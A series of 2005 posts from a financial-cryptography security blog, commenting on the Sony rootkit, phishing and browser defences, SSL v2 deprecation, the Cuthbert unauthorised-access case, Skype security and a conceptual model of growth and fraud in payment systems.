    What's the significance of this? It totally destroys our cosy concept that the attacker is the bad guy and we are the good guys. If I had been caught putting a root kit on someone's machine, I'd have gone to jail, but apparently for Sony, that's not an issue. Security observers are learning the doublethink of one rule for Cuthbert and another rule for Sony.

    5. Although we saw the first signs of trouble for Mac OSX in late 2004, it failed to germinate. Macs reached 5% of the market, better than they'd done for a long time. Mac users had peace - in our time, their time and if things keep going as they are, in their children's time.

    6. Security observers exhibited surprise at how phishing had emerged. SANS still doesn't list it as a threat, but they did decide the Apple OS X was one, primarily because it now has 5% of the market. It's an odd way to do security - punish for popularity - but SANS is popular with its members and training courses sell well. Expect them to list phishing as a threat when the phishers have also reached 5% of the market.

    7. In the good news section, Apple's music sales boomed. Primarily, their great business achievement was managing to walk a line between the cash cow mentality of the music owners and the chinashop bull attitude of Internet mp3 users. Also, not to be underestimated as a core driver of their success, they got the interface and technology right enough such that it is relatively seamless - rumour has it, it just works.

    8. Although Apple's tune was heard loud and clear, file sharing systems continued to romp. Growth continued unabated, and by some estimates, 30% of all bandwidth on the net is consumed by these systems. That's success! But it also means that they are now facing limits to growth themselves. Prosecutions continued, but seemed to do nothing towards growth of file sharing or growth of music sales (either on or off net).

    9. Firefox continued to grow, reaching about 10% of the market by the end of the year. Riding on a complete new build, some solid software engineering and some adroit choices not to follow the Microsoft "innovations" in insecurity like ActiveX, their growth was joyously exponential. Being the one compatible browser across all major platforms did no harm either - corporates now find that they can install it everywhere, and Linux, BSD, OSX *and* Windows users are happy together at last.

    Oh, and I forgot to mention - Mozilla went commercial.

    10. Another slow year in Financial Cryptography. Paypal grew, but fractured more and more along jurisdictional lines. e-gold survived. Actually that's unfair, they survived in 2004 and grew in 2005, but still nobody knows how. Goldmoney surpassed in total value under management, but kept mum about transactions. Industry scuttlebut has it that the bell doesn't ring much. Exchange traded funds are now routine, as model copies of DGCs within the stock market regime.

    11, The surprise entry is WebMoney. This Russian based company keeps popping up above the radar with solid report after solid report. They seem to have adopted many of the lessons of actual real financial cryptography and are even market leaders in some areas. They are the _only ones with low cost arbitration_ -- a development we've been praying for for about 5 years now, in the forum of LexCybernatoria conferences -- and rumour has it that they've actually moved into the distributed issuance space, something that I bet the farm on in 1995 or so.

    How did they do all this? By following Iang's rule number one of market growth, I'd guess: shut the f*** up and work for your customers. Or maybe it was simply because all their press releases are in Russian and only Dany has the time to translate them.

    12. The year of the smart card was not announced. The year of RFIDs was announced. Neither seemed to make any difference, as yet.

    13. Grid became commonplace in the news, as did Virtualisation. The latter has security connotations in that you can now partition off all those dodgy PHP apps on the net. But wait, there's a catch - once you virtualise, they are really separate machines! So it is not clear to me yet how this does any more than firewall and contain the insecurity of webapps. OTOH, I'm impressed by the buzz, and I argue we should be doing the same thing within Apache - sharing multiple SSL servers over one IP# (still not practical...).

    14. In cryptography, the big news was that Skype romped into being the altime world champion at spreading crypto to the masses, only to be bought by eBay. The drums of cryptowar continue to murmur with today's news that the NSA now spies domestically, so expect the NSA to negotiate a pass with Skype. Also, message digests continue to be all messed up, but it doesn't effect us in app space yet. NIST has still not announced a path forward in message digests nor the venerable Digital Signature Algorithm / Standard.

    15. My predictions back in 2005 - The Year of the Snail weren't so bad. Predictions for next year coming up, if there is time before it hits us.

    Thanks all to the readers!


    Addendum: Some other predictions I've seen:

    • http://www.sockpuppet.org/tqbf/log/2005/12/pro-forma-05-06-punditry-results.html">tqbf's Pro-Forma '05-'06 Punditry Results
    Posted by iang at 02:25 PM | Comments (2) | TrackBack

    December 13, 2005

    GP2 - Growth and Fraud - Instructing Security at GP

    In the previous discourse (Meet at the Grigg Point), we discussed how growth works, and said that GP was the tipping point at which the demo became a system. From this model, we can make a number of observations, chief of which is about Security to which we now turn.

    One of the security practitioner's favourite avisos is to suggest that the security is done up front, completely, securely, with strong integration, not to mention obeisance. Imagine the fiercely wiggling finger at this point. Yet, this doctrine has proven to be a disaster and the net's security pundits are in the doldrums over it all. Let's examine some background before getting to how GP helps us with this conundrum.

    Hark to the whispering ghosts of expired security projects. Of those that took heed of the doctrine, most failed, and we do mean most. Completely and utterly, and space does not permit a long list of them, but it is fair to say that one factor (if not the sole or prime factor) is that they spent too much on security and not enough on the biz.

    Some systems succeeded though, and what of them? These divide into three:

    1. those that implemented the full model,
    2. those that implemented a patchwork or rough security system, and
    3. those that did nothing.

    Of those few systems that heeded the wiggling finger and succeeded, we now have some substantial experience. Heavily designed and integrated systems that succeeded initially went on to expose themselves to ... rather traumatic security experiences. Why? In the worst cases, when the fraud started up (around GP) it simply went around the security model, but by that time the model was so cast in mental concrete that there was no flexibility to deal with it. One could argue that these models stopped other forms of fraud, but these arguments generally come from managers who don't admit the existence of the current fraud, so it's an argument designed to be an argument, not something that pushes us forwards.

    Perversely, those systems that did nothing had an easier time of it than even those that implemented a patchwork, because they had nothing to battle.


    fig 4. Investment directs the Revenue Curve

    Why is this? I conjecture that at the beginning of a project the business model is not clear. That is, none of us really knows what to do, but darn it we're inspired! Living and dreaming in Wonderland as we are, this suggests that the business model migrates very quickly, which means that it isn't plausible to construct a security model that lasts longer than a month. Which means several interlinked things:

    Now, anyone who's aware of compounding knows where to put the value: building the business, and security rarely if ever builds business, what it does is protect business that is already there. It's the issue of compounding we turn to now. Figure 4 depicts the cost of investment down below the horizontal axis, and the growth above. Investment isn't exponential, so it's not a straight line. Initially it grows well, but then hits limits to growth which doom it to sub-exponential growth, which is probably just as well as any investor I've met prefers less than exponential growth in contributions!

    While not well depicted in that figure, consider that the pattern of investment fundamentally sets the growth model. The Orange line dictates the slope and placement of the Blue!

    Now let's fiddle a bit in figure 5. Assume that investment is fixed. But we've decided to invest upfront in a big way in security, because that's what everyone said was the only way to sleep well at nights. Now the Orange Region of total investment over time is divided into two - above the thin line is what we invest in the business, and below the line is the security. The total is still the same, so security investment has squeezed us upfront.


    fig 5. More Costs means Growth is Flatter and GP is Later

    See what happens? Because resources were directed away from business, into security, the growth curve started later, and when the security model kicked in, the curve flattened up. That's because all security has a cost. If you're lucky, and your security team is hot (and I really do mean blistering here, see what I wrote about "most" above...) the kink won't be measurable.

    Why is it so big? And why don't managers wade in there with mallet and axe and bash it back into forward growth before we can say hedonism is the lifeblood of capitalism? Oddly, the chances of a manager seeing it are pretty remote because seeing drivers to growth is a very hard art, most people just can't see things like that and assume that either today goes for ever, or tomorrow will solve everything. The end users often notice it, and respond in one of two ways: they scream and holler or they stop using the system. An example of the former is from the old SSL days when businesses screamed that it sucked up 5 times the CPU ... so they switched to hybrid SSL/raw sites. An example of the latter is available every time you click on a link and it asks you to register for your free or paid account to read an article or to respond to an article.

    Students of security will be crying foul at this point because security does good. So they say. In fact what it does is less bad: until we draw in the fraud curve which security nicely attempts to alleviate the bad done by fraud, security is just a cost. And a deadweight one at that. Which brings us to our third observation: the upfront attention to security has pushed GP way over to the right, as it must do if you agree with the principle of GP.

    So where is all this leading us? At this point we should understand that security is employed too early if employed at the beginning - the costs incur a dramatic shift of the curve of growth. Both to the right, and a flattening due to the additional drain. And we haven't even drawn in the other points above: restarts and kickback.

    This logic says that we should delay security as long as we can, but this can't go on forever. The point where the security really kicks in and does less bad is when the bad kicks in: the fraud curve that slides up and explodes after GP. Then, the ideal point in which to kick security is after GP and before the fraudulent red line runs in ink onto the balance sheet.

    Which leads us to question - finally, for some, no doubt - When is GP?. That is saved to another day :-)

    Posted by iang at 07:22 PM | Comments (1) | TrackBack

    December 12, 2005

    FUDWatch - US Treasury builds up for intervention in Internet Governance?

    The US treasury has apparently launched an attack on Internet governance with a FUD claim:

    RIYADH (Reuters) - Global cybercrime generated a higher turnover than drug trafficking in 2004 and is set to grow even further with the wider use of technology in developing countries, a top expert said on Monday. No country is immune from cybercrime, which includes corporate espionage, child pornography, stock manipulation, extortion and piracy, said Valerie McNiven, who advises the U.S. Treasury on cybercrime.
    "Last year was the first year that proceeds from cybercrime were greater than proceeds from the sale of illegal drugs, and that was, I believe, over $105 billion," McNiven told Reuters. Cybercrime is moving at such a high speed that law enforcement cannot catch up with it."

    For example, Web sites used by fraudsters for "phishing" -- the practice of tricking computer users into revealing their bank details and other personal data -- only stayed on the Internet for a maximum of 48 hours, she said.

    Lumping in "corporate espionage, child pornography, stock manipulation, extortion and piracy" with cybercrime is like saying that roads and cars are responsible for bank robberies, because most bank robberies use a getaway vehicle. The US Treasury needs to be told that if they make stupid statements then their reputation is likely to suffer. I suppose they'll be blaming the rise in their T-bills interest on cybercriminals next.

    Posted by iang at 09:24 AM | Comments (3) | TrackBack

    December 11, 2005

    GP1 - Growth and Fraud - Meet at the Grigg Point

    Imagine if you will a successful FC system on the net. That means a system with value, practically, but for moment, keep close in your mind your favourite payments system. Success means solid growth, beyond some point of survival, into the area where growth is assured. It looks like this:


    fig 1. Exponential Growth

    That's an exponential curve, badly drawn by hand. It's exponential because that's what growth means; all growth and shrinkage is exponential. Let's draw that as a logarithmic curve, so we see a straight line:


    fig 2. Growth Crosses the Value Tipping Point

    I've observed in many businesses of monetary nature that there is a special tipping point. This is where the system transitions from being a working demo that is driven forwards by the keenness of its first 100 or so users, to being a system where the value in the system is inherent and cohesive. In and of itself, the value in the system is of such value that it changes the dynamics of the system.

    That's why I labelled it the Self-Sustaining Value Growth Tipping Point, or GP for short. Before this point, the system will simply stop if we the founders or we the users stop pushing. After this point, there is a sustained machine that will keep rolling on, creating more and more activity. In short, it's unstoppable, at least as compared to beforehand.

    The shortened term indicates who to blame when you reach that point, because there is something else that is going to happen here: fraud! When the system passes GP, and the value is now inherently stealable for its value, then someone will come along and try to steal it.


    fig 3. Fraud Kicks Off then Levels Off

    And that theft will probably work, if history is any judge. You'll get a rash of frauds breaking out, either insider or outsider fraud, and all will appear to be chaos. Actually, it's not chaos, it's just competition for different fraud models, and soon it will settle down to a set of best practices in fraud. At this point, when all the mistakes have been made and the surviving crooks know what they are about, fraud will rise rapidly, then asymptotically approach its long run standard level. Ask any credit card company.

    Remember that the graph above has a logarithmic vertical axis, so vertical distances of small amounts mean big distances in absolute amounts. The long run gap between those lines - red to blue - is about two if the vertical was log 10. Assuming that, 102 gives us 100 which means fraud is 1% of total at any time. 1% is a good benchmark, a great number to use if you have no other number, even if the preceeding mathematics are rather ropey. Some systems deliver less, some deliver more, it all depends, but we're in the right area for a log chart.

    Now that we have the model in place, what can we do with GP? Quite a lot, it seems, but that waits for the next exciting installment of Growth and the Big GP!


    This is Part 1 of Growth and Fraud:

    Posted by iang at 03:21 PM | Comments (4) | TrackBack

    November 25, 2005

    Browser Manufacturers share anti-phishing tricks - Farce, Soap, and 3 great things

    News comes from multiple places that the Browser manufacturers (Microsoft, KDE, Mozilla, Opera) got together and displayed their anti-phishing techniques to each other. It was yet another private meeting, where the people who've done good research on anti-phishing weren't involved - a sure sign that this is not only about phishing. I'd reckon we need one more meeting before the penny drops on that one.

    Consensus seems to have emerged that changing the colour of the URL bar is a good idea. Now they have to decide on whether it would be confusing to have different colours (compete on security?!) or compatible colours (all browsers must be equal!?). Let's assume that Microsoft wins by normal fiat: White means nothing, Yellow means suspicious, Green means "high assurance assured" and Red means "confirmed phishing site".

    Which means Mozilla has to go back and rethink its colours, or risk a confusing user experience - which happens to be a higher goal than security for Mozilla. As I sit and type these words, my URL bar is yellow for TLS and green for Petname good; if I was an IE7 user I'd be confused.

    All is not soap opera and colour wars - three great things have happened. Firstly, Microsoft has decided to put the CA name on the chrome. They've placed it in the URL bar, when it is coloured green (rotating the CA name with the site name). That is fantastic news, both for Microsoft and for users. For the former, as it clearly indicates who says this is a good site, Microsoft is off the hook, legally. Expect the others to follow suit, when they work out why this is good for them. For the users, it now enables them to prepare for the substitute CA attack, something we haven't seen yet, but it was always possible (due to a bug in PKI).

    Secondly, George of KDE writes:

    All agreed to push ahead with plans to introduce stronger encryption protocols. "With the availability of bot nets and massively distributed computing, current encryption standards are showing their age," Staikos writes. "Prompted by Opera, we are moving towards the removal of SSLv2 from our browsers. IE will disable SSLv2 in version 7 and it has been completely removed in the KDE 4 source tree already."

    SSL v2 must die! Silly reasons, but the result is what we want - SSL v2 must die, and if they think it is about 40 bit crypto algorithms, who are we to point out that 9 years after the cute demo by a couple of bored students, crooks are too busy stealing money from browser users to bother with cool things like breaking crypto with their otherwise gainfully employed botnets... But did we say, SSL v2 must die (if only so I can fix the bloody cert on my own site to share domains)?

    Thirdly, three four! of five browser manufacturers (1 and 1 , 2. Also, add 3) now admit that phishing is an attack on the browser. We can now get on with the real work of strengthening the browser, and ignore all the nonsense about social engineering and bad banks that send out silly emails and hoping that crooks will follow yet more silly regulations. That's not to say that these things aren't relevant, but they are not core. The core of the attack is against the browser.

    In the past few years the Internet has seen a rapid growth in phishing attacks. There have been many attempts to mitigate these types of attack, but they rarely get at the root of them problem: fundamental flaws in Internet architecture and browser technology. Throughout this year I had the fortunate opportunity to participate in discussions with members of the Internet Explorer, Mozilla/FireFox, and Opera development teams with the goal of understanding and addressing some of these issues in a co-operative manner.

    Thank you George! Right on track with IE7's release, things are starting to move along. Strategically, it is pretty clear that Microsoft owns browser space, and for reasons not explained today, is deciding to play open and cooperative for the moment. I think that's probably as good as it gets right now, as it is pretty clear that when it comes to matters security, the browser manufacturers need a leader. Microsoft has the most to lose in this game, so by default, is the leader.

    PS: I would be remiss if I didn't mention the debate on "high assurance" certificates and trying to pin phishing on the CAs. Nonsense and Farce! Get a clue, guys! If that was going to work then the current setup would have already dealt with it. The reason it doesn't and won't work is because the PKI is all smoke and mirrors, and adding another mirror and lighting another fire won't improve the stability and strength of the PKI.

    Posted by iang at 04:36 AM | Comments (8) | TrackBack

    November 21, 2005

    Frank Hecker goes to the Mountain - mapping the structure of the Certificate Authority

    Frank takes aim at the woeful business known as certificate authorities in an attempt to chart out their structural elements and market opportunities.

    Frank argues that CAs can be viewed as providers of one of encryption, DNS-fixes, site identity proofs, or as anti-fraud services. Depending on which you choose, this has grave ramifications for what follows next -- Frank's thesis implicitly seems to be that only one of those can be pursued, and each have severe problems, if not inescapable and intractable contradictions. In the meantime, what is a browser manufacturer supposed to do?

    For those who have followed the PKI debate this will not surprise. What is stunningly new -- as in news -- is that this is the first time to my knowledge that a PKI user organisation has come out and said "we have a problem here, folks!" Actually, Frank doesn't say that in words, but if you understand what he writes, then you'd have to be pre-neanderthalic not to detect the discord.

    What to do next is not clear -- so it would appear that this essay is simply the start of the debate. That's very welcome, albeit belated.

    Posted by iang at 06:33 PM | Comments (1) | TrackBack

    November 06, 2005

    ACM Interactions - special issue on Security

    Submissions Deadline: February 1st, 2006
    Publications Issue: May+June 2006 Issue
    PDF: here but please note that it causes lockups.

    Interactions is published bi-monthly by the Association for Computer Machinery (ACM) for designers of interactive products. It is a magazine that balances articles written for professionals and researchers alike providing broad coverage of topics relevant to the HCI community.

    The May+June 2006 issue of Interactions is dedicated to the user experience around security in information systems. Designing systems that are both secure and usable offers unique challenges to interaction designers. System complexity, user acceptance and compliance, and decisions about protection versus convenience all factor into the design process and resulting effectiveness of security systems in the hands of users.

    Interactions invites authors to submit case studies and articles related to the security user experience. Papers should be written in a reader-friendly magazine style and tone as opposed to a conference proceedings or journal style (no abstracts, appendicies, etc).

    Relevant contributions will address issues related, but not limited to, the following:

    Interactions invites papers in the following two formats:

    1. Case Studies 7-9 pages. Case Studies are reports on experiences gained and lessones learned designing, using, or studying security components/systems or techniques. They take a comprehensive view of a problem from requirements analysis through design, implementation, and use.
    2. Articles 1-3 pages. Articles are much shorter and broader case studies and may present research findings, points of view, social or philosophical inquiries, novel interface designs, or other information relevant to the HCI community regarding security and the user experience.

    Papers that appear in Interactions are archived in the ACM Digital Library and available online. The Special Issue on Security will appear in the May+June 2006 issue of Interactions and the deadline for submissions is February 1st, 2006.

    For more information about submission guidelines or appropriate topics, contact ryan.west@sas.com.

    Posted by iang at 08:15 AM | Comments (0) | TrackBack

    November 01, 2005

    Sony v. their customers - who's attacking who?

    In another story similar in spirit to the Cuthbert case, Adam points to Mark who discovers that Sony has installed malware into his Microsoft Windows OS. It's a long technical description which will be fun for those who follow p2p, DRM, music or windows security. For the rest I will try and summarise:

    Mark bought a music disk and played it on his PC. The music disk installed a secret _root kit_ which is a programme to execute with privileges and take control of Microsoft's OS in unknown and nefarious ways. In this case, its primary purpose was to stop Mark playing his purchased music disk in various ways.

    The derivative effects were a mess. Mark knows security so he spent a long time cleaning out his system. It wasn't easy, well beyond most Windows experts, even ones with security training, I'd guess. (But you can always reformat your drive!)

    No hope for the planet there, then, but what struck me was this: Who was attacking who? Was Sony attacking Mark? Was Mark attacking Sony? Or maybe they were both attacking Microsoft?

    In all these interpretations, the participants did actions that were undesirable, according to some theory. Yet they had pretty reasonable justifications, on the face of it. Read the comments for more on this; it seems that the readers for the most part picked up on the dilemmas.

    So, following Cuthbert (1, 2, 3) both could take each other to court, and I suppose Microsoft could dig in there as well. Following the laws of power, Sony would win against Mark because Sony is the corporation,and Microsoft would win against Sony, because Microsoft always wins.

    Then, there is the question of who was authorised to do what? Again, confusion reigns, as although there was a disclaimer on the merchant site that the disk had some DRM in it, what that disclaimer didn't say was that software that would be classified as malware would be installed. Later on, a bright commenter reported that the EULA from the supplier's web site had changed to add a clause saying that software would be added to your Windows OS.

    I can't help being totally skeptical about this notion of "authorisation." It doesn't pass the laugh test - putting a clause in an EULA just doesn't seem to be adequate "authorisation" to infect a user's machine with a rootkit, yet again following the spirit of Cuthbert, Sony would be authorised because they said they were, even if after the fact. Neither does the law that "unauthorises" the PC owner to reverse-engineer the code in order to protect his property make any sense.

    So where are we? In a mess, that's where. The traditional security assumptions are being challenged, and the framework to which people have been working has been rent asunder. A few weeks ago the attackers were BT and Cuthbert, on the field of Tsunami charity, now its Sony and Mark, on the field of Microsoft and music. In the meantime, the only approach that I've heard make any sense is the Russian legal theory as espoused by Daniel: Caveat Lector. If you are on the net, you are on your own. Unfortunately most of us are not in Russia, so we can't benefit from the right to protect ourselves, and have to look to BT, Sony and Microsoft to protect us.

    What a mess!

    Addendums:

    And in closing, I just noticed this image of Planet Sony Root Kit over at Adam's entry:


    Posted by iang at 05:55 AM | Comments (2) | TrackBack

    October 26, 2005

    Breaking Payment Systems and other bog standard essentials

    Many people have sent me pointers to How ATM fraud nearly brought down British banking. It's well worth reading as a governance story, it's as good a one as I've ever seen! In this case, a fairly bog standard insider operation in a major brit bank (not revealed but I guess everyone knows which one) raided some 2000 user accounts and probably more. They did all this through the bank's supposedly fool proof transaction system, and the bank aided and abetted by refusing to believe there was an issue! Further, given the courts willingness to protect the banks' secrecy, one can say that the courts also aided and abetted the crooks.

    This is the story of how the UK banking system could have collapsed in the early 1990s, but for the forbearance of a junior barrister who also happened to be an expert in computer law - and who discovered that at that time the computing department of one of the banks issuing ATM cards had "gone rogue", cracking PINs and taking money from customers' accounts with abandon.

    This is bog standard. Once a system grows to a certain point, insider fraud is almost a given, and it is to this that the wiser FCer turns. As I say, this is a must-read, especially if you are new to FC. Here's news for local currency pundits on how easy it is to forge basic paper tokens.

    In a world of home laser printers and multimedia PCs, counterfeiting has become increasingly easy. With materials available at any office supply store, those with a cursory knowledge of photo-editing software can duplicate the business-card-size rewards cards once punched at Cold Stone Creamery or the stamps once given out at Subway sandwich sho........

    Steven Bellovin reports that Skype have responded to criticisms over their "secret cryptoprotocol."

    Skype has released an external security evaluation of its product; you can find it at http://www.skype.com/security/files/2005-031%20security%20evaluation.pdf (Skype was also clueful enough to publish the PGP signature of the report, an excellent touch -- see http://www.skype.com/security/files/2005-031%20security%20evaluation.pdf.sig) The author of the report, Tom Berson, has been in this business for many years; I have a great deal of respect for him.
    --Steven M. Bellovin, http://www.cs.columbia.edu/~smb

    Predictibly, people have pored over the report and criticised that, but most have missed the point that unless you happen to have an NSA-built phone on your desk, it's still more secure than anything else you have available. More usefully, Cubicle reports that there is an update to Skype that repairs a few bugs. As he includes some analysis of how to exploit and create some worms... it might be worth it to plan on updating:

    The Blackhat in me salivates at the prospect. It’s beautiful security judo, leveraging tools designed to protect confidentiality (crypto) and Availability (peer-to-peer) to better hide my nefarious doings. Combine it with a skype API-based payload and you’ve got a Skype worm that can leverage the implicit trust relationship of contact lists to propagate further, all potentially wrapped inside Skype’s own crypto.

    Too bad the first that most of Skype’s 60 million-and-growing users will ever hear of it will be after someone who does pay attention to these sorts of things decides they want to see if it’s possible to create a 60-million node botnet or retire after making The One Big Score with SkypeOut and toll fraud.

    Hey Skype, Ignoring Risk is Accepting Risk–NOT Avoiding it. Put this on your main page while upgrading is still prevention rather than incident response.

    A little hyperventilated, but consider yourself in need of a Skype upgrade.

    Posted by iang at 03:08 PM | Comments (1) | TrackBack

    October 25, 2005

    Microsoft scores in anti-phishing!

    Finally, some good news! Matthias points out that Microsoft has announced that they are switching to TLS in browsers. Hooray! This means no more SSL v2, and the other laxidaisical dinosaurs of the browser world can be expected to shuffle into line (Mozilla, Safari, Konqueror, Opera... yes, you may well look down in shame, especially Mozilla which was facing a bombardment of clues).

    I have a sneaking suspicion that Microsoft actually are thinking a bit - not hugely but a bit - about phishing and are looking at some of the easier ways to deal with it. First, they acknowledged that phishing was a browser problem, and no other browser supplier to my knowledge has done that. Secondly, they mention from time to time phishing and security in the same breath, while the other guys are still stuck on patch counts and bug statistics and similar side issues. Thirdly:

    As part of Microsoft's "secure by default" design philosophy, IE7 will block encrypted web sessions to sites with problematic (untrusted, revoked or expired) digital certificates. Users will receive a warning when they visit potentially insecure sites, which users can choose to ignore, except where certificates are revoked. "If the user clicks through a certificate error page, the address bar will flood-fill with red to serve as a persistent notification of the problem," Lawrence explained.

    Huh. Not a bad idea, that, although note that it is logically the reverse of what the Petname and Trustbar people do! (Debates can be had, and more could be done, but a start is a start!) Fourthly:

    The Beta 2 version of IE7 also changes the way non secure content is rendered in a secure web page. IE7 renders only the secure content by default but it offers surfers the chance to unblock the nonsecure content on a secure page using the Information Bar.

    Fifthly, dropping SSL v2 as default: it's hard to concisely draw the complex connection between TLS and phishing, but it's easy to show its general or two-step effects. Microsoft makes a game attempt at this:

    Lastly, the TLS implementation has been updated to support Extensions as described in RFC 3546. TLS extensions improve performance, and add capabilities to the TLS protocol. The most interesting of the extensions is the Server Name Indication (SNI) extension, as it resolves one of the long-standing limitations for HTTPS hosting.

    A little background: When a web browser initiates a HTTPS handshake with a web server, the server immediately sends down a digital certificate. The hostname of the server is listed inside the digital certificate, and the browser compares it to the hostname it was attempting to reach. If these hostnames do not match, the browser raises an error.

    The matching-hostnames requirement causes a problem if a single-IP is configured to host multiple sites (sometimes known as “virtual-hosting”). Ordinarily, a virtual-hosting server examines the HTTP Host request header to determine what HTTP content to return. However, in the HTTPS case, the server must provide a digital certificate before it receives the HTTP headers from the browser. SNI resolves this problem by listing the target server’s hostname in the SNI extension field of the initial client handshake with the secure server. A virtual-hosting server may examine the SNI extension to determine which digital certificate to send back to the client.

    I told you it wasn't easy to explain ... in short, this means that many more ordinary sites can now use HTTPS to protect content, which speeds up the general availability of TLS (was SSL) which then kicks back and means browsers and plugins can protect against phishing. Top banana!

    Last week there was a general panic issued at core Internet level - SSL v2 in OpenSSL had a flaw in it. Unfortunately, as there was no capability to turn off SSL v2 within OpenSSL, the problem turned into a schmozzle as OpenSSL is both incorporated in many packages, and also distributed in many forms. Maybe this discussion tipped the balance: get rid of SSL v2 everywhere.

    Hat tip to Microsoft for having the guts to do what no other company or open source group did.

    Posted by iang at 06:12 PM | Comments (3) | TrackBack

    Security Professionals Advised to Button Lips

    Nick pointed me to his Cuthbert post, and I asked where the RSS feed was, adding "I cannot see it on the page, and I'm not clued enough to invent it." To which he dryly commented "if you tried to invent it you'd arguably end up creating many 'unauthorized' URLs in the process...."

    Welcome to the world of security post-Cuthbert. He raises many points:

    Under these statutes, the Web equivalent of pushing on the door of a grocery store to see if it's still open has been made a crime. These vague and overly broad statutes put security professionals and other curious web users at risk. We depend on network security professionals to protect us from cyberterrorism, phishing, and many other on-line threats. These statutes, as currently worded and applied, threaten them with career ruin for carrying out their jobs. Cuthbert was convicted for attempting to determine whether a web site that looked like British Telecom's payment site was actually a phishing site, by adding just the characters "../.." to the BT site's URL. If we are to defeat phishing and prevent cyberterrorism, we need more curious and public-spirited people like Cuthbert.

    Meanwhile, these statutes generally require "knowledge" that the access was "unauthorized." It is thus crucial for your future liberty and career that, if you suspect that you are suspected of any sort of "unauthorized access," take advantage of your Miranda (hopefully you have some similar right if you are overseas) right to remain silent. This is a very sad thing to have to recommend to network security professionals, because the world loses a great deal of security when security professionals can no longer speak frankly to law-enforcement authorities. But until the law is fixed you are a complete idiot if you flap your lips [my emphasis].

    Point! I had not thought so far, although I had pointed out that security professionals are now going to have to raise fingers from keyboards whenever in the course of their work they are asked to "investigate a fraud."


    Consider the ramifications of an inadvertant hit on a site - what are you going to do when the Met Police comes around for a little chat? Counsel would probably suggest "say nothing." Or more neutrally, "I do not recollect doing anything on that day .. to that site .. on this planet!" as the concept of Miranda rights is not so widely encouraged outside the US. Unfortunately, the knock on effect of Cuthbert is that until you are appraised of the case in detail -- something that never happens -- then you will not know whether you are suspect or not, and your only safe choice is to keep your lips buttoned.

    Nick goes on to discuss ways to repair the law, and while I agree that this would be potentially welcome, I am not sure whether it is necessary. Discussion with the cap-talk people (the most scientific security group that I am aware of, but not the least argumentive!) has led to the following theory: the judgement was flawed because it was claimed that the access was unauthorised. This was false. Specifically, the RFC authorises the access, and there is no reasonably theory to the alternate, including any sign on the site that explains what is authorised and what not. The best that could be argued - in a spirited defence by devil's advocate Sandro Magi - is that any link not provided by the site is unauthorised by default.

    In contrast, there is a view among some security consultants that you should never do anything you shouldn't ever do, which is more or less what the "unauthorised" claim espouses. On the surface this sounds reasonable, but it has intractable difficulties. What shouldn't you ever do? Where does it say this? What happens if it *is* a phishing site? This view is neither widely understood by the user public nor plausibly explained by the proponents of that view, and it would appear to be a cop-out in all senses.

    Worse, it blows a hole in the waterline of any phishing defence known to actually work - how are we going to help users to defend themselves if we ourselves are skating within cracking distance of the thin ice of Cuthbert? Unfortunately, explaining why it is not a rational theory in legal, economic or user terms is about as difficult as having an honest discussion about phishing. Score Cuthbert up as an own-goal for the anti-phishing side.

    Posted by iang at 05:14 PM | Comments (3) | TrackBack

    October 14, 2005

    The Perfect Phish - all conditions are now in place

    News of active MITM attacks have reached us with Yahoo being the one attacked. This involves the phisher driving the traffic from his fake site back to Yahoo in real time. Previously, phishers just collected the data and used it later, now they get access directly, which gives them immediate possibilities in the event that they tripped any alarm bells that would later on close of access.

    Bad news for Lloyds TSB who are experimenting with what look like SecureId tokens. These tokens do a crypto maths problem that is syncronised with a matching server program back at the website. It is based on time, and the numbers change as the minutes roll by.

    It's a nice token to prove (to some definition of the word) that you are talking to is who you want to be talking to. The problem is, as discussed and predicted not just here but in security groups elsewhere, this only works if the phisher delays acting. It specifically and famously doesn't work against the above man-in-the-middle (MITM) attack as it can't tell if anyone else is sitting in between you and the other party! Sorry about that, but you do insist on buying these things from big companies and not doing the proper due diligence.

    How significant is all this? Well, quite important: it's the last link. Every piece is now in place for the perfect phish. The phishers recently tried out SSL attacks in anger so they have all that cert and SSL code in place, they are now doing MITMs so they have the real-time backend work in place (this is just multi-tiered or webservice work, recall) and we've had easy-to-obtain popup-tax certs for about 2-3 years now (even works with a stolen credit card...).

    When the perfect phish takes place is difficult to predict, but I'll stick my neck out and say by the end of the year. Users will be looking at a perfectly good website, with SSL and the little padlock, and talking to their banks. The only thing that will be wrong will be the URL, but it will be camouflaged somehow. Is this realistic? Very. For the last year or more we've been in a holding pattern as phishers have migrated their model from area to area looking for new schools of fresh phish.

    Posted by iang at 03:34 PM | Comments (12) | TrackBack

    October 12, 2005

    Developers 'should be liable' for security holes

    It just gets better and better! Twan points out a chap called Howard Schmidt who popped over from the US to tell the Brits how to do it. Number One prescription is to pin it on the individual developers:

    Software developers should be held personally accountable for the security of the code they write, said Howard Schmidt, former White House cybersecurity advisor, on Tuesday.
    Speaking at Secure London 2005, Schmidt, who is now the president and chief executive of R&H Security Consulting, also called for better training for software developers, many of who he believes don't have the skills needed to write secure code.

    "In software development, we need to have personal quality assurances from developers that the code they write is secure," said Schmidt, who cited the example of some developers he recently met who had created a Web application to talk to a back-end database using SSL.

    "They had strong authentication, strong passwords, an encrypted tunnel. The stored data was encrypted. But, when that data was sent to the purchasing office, it was sent as a plain text file. This was not an end-to-end solution. We need individual accountability from developers for end-to-end solutions so we can go to them and say: 'Is this completely secure?'," Schmidt said.

    Schmidt also referred to a recent survey from Microsoft which found that 64 percent of software developers were not confident they could write secure applications. For him, better training is the way forward.

    What can we gather from that? Well, approximately 64% of the people that Microsoft surveyed are honest, or at least weren't going to be caught by the obvious trick question.

    This completely stinks of a manager's first order solution: see pile of smelly brown muck, blame the person standing closest. With this level of analysis, we can only thank our lucky stars that Schmidt didn't get promoted from cybersecurity advisor to Strategic Air Command or the captaincy of an Aegis cruiser.

    Predictably the comments section on that article is full to bursting of outraged developers who are pointing out quite rightly that they don't own the code, don't own the budget, and don't own the managers. And the British Computer Society was on hand to remind how security is quite tricky stuff, really, thank you very much. Although I think they lost it here:

    "...They should also be accredited with a CMM [Capability Maturity Model] standard - it's like a kitemark. CMM level three, four or five is an indication the software has been developed by quality developers," the BCS spokesperson said. "The software has to be shown to be fit for purpose. This is essential for producing a trustworthy online environment."

    Oh well, thanks Twan for sharing with us what is causing giggles in mainland Europe.

    Posted by iang at 03:47 PM | Comments (0) | TrackBack

    October 11, 2005

    SSL v2 SNAFU

    The net is buzzing about an "OpenSSL Potential SSL 2.0 Rollback Vulnerability" (1, 2) where you can trick your SSL v3 to roll back to SSL v2. There are then some security weaknesses in SSL v2 that can be exploited to break in.

